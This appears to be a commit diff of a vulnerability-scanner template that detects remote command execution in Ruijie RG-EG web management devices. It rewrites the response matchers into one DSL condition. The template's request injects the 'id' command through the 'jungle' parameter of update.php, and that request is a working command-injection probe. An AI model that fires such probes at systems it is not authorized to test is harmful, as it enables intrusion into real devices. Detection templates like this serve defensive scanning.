Update ruijie-rg-eg-web-mis-rce.yaml
parent
f5507a81b9
commit
dc0ad486a4
|
@ -31,13 +31,10 @@ http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/update.php?jungle=id"
|
- "{{BaseURL}}/update.php?jungle=id"
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: regex
|
|
||||||
part: body
|
|
||||||
regex:
|
|
||||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
|
|
||||||
|
|
||||||
- type: status
|
matchers:
|
||||||
status:
|
- type: dsl
|
||||||
- 200
|
dsl:
|
||||||
|
- 'status_code == 200'
|
||||||
|
- 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
|
||||||
|
condition: and
|
||||||
|
|
Loading…
Reference in New Issue